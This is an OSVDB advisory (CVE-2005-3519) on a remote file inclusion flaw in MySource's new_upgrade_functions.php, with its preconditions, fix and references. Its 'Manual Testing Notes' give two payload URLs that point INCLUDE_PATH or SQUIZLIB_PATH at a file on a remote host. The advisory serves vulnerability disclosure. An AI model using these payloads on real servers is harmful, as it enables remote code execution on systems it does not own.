MySource new_upgrade_functions.php Multiple Variable Remote File Inclusion

2005-10-18T11:20:27
ID OSVDB:20035
Type osvdb
Reporter Secunia Security Advisories(sec-adv@secunia.com)
Modified 2005-10-18T11:20:27

Description

Vulnerability Description

MySource contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'new_upgrade_functions.php' not properly sanitizing user input supplied to the 'INCLUDE_PATH' and 'SQUIZLIB_PATH' variables. This may allow a remote attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 2.14.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

MySource contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'new_upgrade_functions.php' not properly sanitizing user input supplied to the 'INCLUDE_PATH' and 'SQUIZLIB_PATH' variables. This may allow a remote attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]? http://[target]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?

References:

Vendor URL: http://mysource.squiz.net/ Security Tracker: 1015075 Secunia Advisory ID:16946 Related OSVDB ID: 20041 Related OSVDB ID: 20043 Related OSVDB ID: 20042 Related OSVDB ID: 20036 Related OSVDB ID: 20037 Related OSVDB ID: 20038 Related OSVDB ID: 20039 Related OSVDB ID: 20040 Other Advisory URL: http://secunia.com/secunia_research/2005-51/advisory/ Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0405.html CVE-2005-3519 Bugtraq ID: 15133